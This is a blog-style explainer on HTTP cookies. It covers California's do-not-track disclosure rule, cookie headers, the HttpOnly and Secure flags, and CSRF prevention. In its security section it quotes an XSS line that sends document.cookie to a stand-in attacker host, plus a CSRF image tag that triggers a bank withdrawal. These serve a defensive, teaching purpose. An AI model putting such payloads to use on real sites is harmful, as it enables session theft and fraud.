Honestly, I was curious about the “cookie” promopt all the time but I didn’t really care about it until I came across the The California Internet Privacy Bill, then I knew why I often saw these on all kinds of website, but strangely, I have never seen this thing on chinese websites. Maybe we don’t respect the privacy of others, haha. But it really enlightened me on the thoughts about the privacy and the concerns about the security of cookies.
If any consumers of your web service are located in the state of California, you must:
- Explain “how you deal with” do-not-track requests.
- Make that information available in a conspicuous way from your homepage. (A text link to a privacy policy will do the trick)
Like this:
In case you don’t know:
An HTTP cookie is a small piece of data that a server sends to the user’s web browser. The browser may store it and send it back with the next request to the same server.
Cookies are mainly used for three purposes:
Session management
Logins, shopping carts, game scores, or anything else the server should remember</p>
Personalization
User preferences, themes, and other settings
Tracking
Recording and analyzing user behavior
Cookies are sent with every request, so they can worsen performance (especially for mobile data connections). Modern APIs are recommended for client storage via Web storage API (localStorage and sessionStorage) and IndexedDB.
Cookies set:
HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco
Set-Cookie: tasty_cookie=strawberry
...
Now, with every new request to the server, all previously stored cookies are sent to the server using the Cookie header.
GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry
Security
HttpOnly
To prevent cross-site scripting (XSS) attacks, HttpOnly cookies are inaccessible to JavaScript’s Document.cookie API. Instead, they are only sent to the server.
An example of exploiting XSS vulnerabilites:
(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
The HttpOnly cookie attribute can help by preventing access to cookie value through JavaScript.
Secure
A secure cookie is only sent to the server with a encrypted request over the HTTPS protocol. Even with Secure, sensitive information should never be stored in cookies, as they are inherently insecure and this flag can’t offer real protection.
So, we are supposed to set cookies like this:
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly
Cross-site request forgery (CSRF)
There is an good example of explainning what is CSRF on Wikipedia.
Someone sent you a malicious link like this,
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">
If you are logged into your bank account and your cookies are still valid (and there is no other validation), you will transfer money as soon as you load the HTML that contains this image!
There are a few techniques that are used to prevent this from happening:
- input filtering
- confirmation required for any sensitive action
- short lifetime of cookies for sensitive actions
For more prevention tips, see the OWASP CSRF prevention cheat sheet.
1.Cookies